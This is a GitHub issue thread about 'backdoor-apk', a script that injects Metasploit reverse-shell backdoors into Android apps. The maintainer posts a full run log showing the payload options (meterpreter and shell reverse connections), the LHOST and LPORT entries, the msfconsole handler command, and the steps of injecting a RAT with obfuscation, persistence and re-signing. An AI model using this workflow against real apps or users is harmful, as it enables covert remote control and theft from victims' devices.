dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.17k stars 699 forks source link

ailed to recompile original project with backdoor #110

Closed aleemladha closed 7 years ago

aleemladha commented 7 years ago

The following file failed to recompile with the backdoor D2D.zip

dana-at-cp commented 7 years ago

@aleemladha Apologies for the delay. I'll check this out today or tomorrow.

dana-at-cp commented 7 years ago

@aleemladha The APK file you shared gets processed successfully in my environment:

root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh D2D.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.2 on Thu Aug  3 10:31:43 EDT 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Code/github/backdoor-apk/backdoor-apk#
dana-at-cp commented 7 years ago

@aleemladha I used the APK file you shared:

root@kali:~/Code/github/backdoor-apk/backdoor-apk# sha256sum D2D.apk 
4faf3af9fe8c6a03c2ce648a4845b4c25bd1ccd1cae03273fb80531814db2731  D2D.apk
root@kali:~/Code/github/backdoor-apk/backdoor-apk#
dana-at-cp commented 7 years ago

@aleemladha Sorry. I can't reproduce your issue.

Nisthar commented 6 years ago

@dana-at-cp Does it still work for you?

I am getting this error also. I think this issue with apktool is not solved yet.

Would be nice if there is a workaround for this?